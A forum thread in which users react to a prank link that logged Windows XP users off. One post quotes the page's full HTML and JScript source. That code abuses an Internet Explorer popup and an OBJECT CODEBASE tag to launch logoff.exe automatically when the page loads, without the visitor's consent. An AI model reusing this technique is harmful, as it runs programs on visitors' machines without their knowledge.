• We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.

COol link, XP users only

I clicked it. I saw little things starting to load and suspected it was going to set a theme to make winders look like a Mac or something per the only thing on screen something like "Too bad you don't have windows XP anymore" or something like that.

I closed the window before much of anything could load, and I was logged out. I had to click on my administrator button to log back in. No biggie.

nik
 
Ah, I see why it didn't work. The source specifies C: as the drive Windows is installed in. I dual boot with 98, so my XP Windows directory is on the D: drive.
 


<< I'm not gonna do it as a friend recently sent me a link and I had to reboot! >>



It's the same thing. From the look of the code it looks like it's the sort of thing Windows update would do after installing critical updates, except it asks you if you want to reboot, not just do it. 😛
 
What happened? I have winxp and I clicked on it... All it said was "You should feel lucky if you dont have XP right now." I don't get it...........................
 
I just saw a few flashes of boxes, couldn't see any text as it was, but about 10-15 seconds later, up popped the logon screen. How amusing 😛
 
excerpt:

<HTML>
<HEAD>
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);

function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
 
hmm, I clicked it and got a white screen that said something like aren't you glad your not using winXP and there were some small boxes down lower... but thats it... nothing else. was something supposed to happen? BTW I am using Win XP
 
Back
Top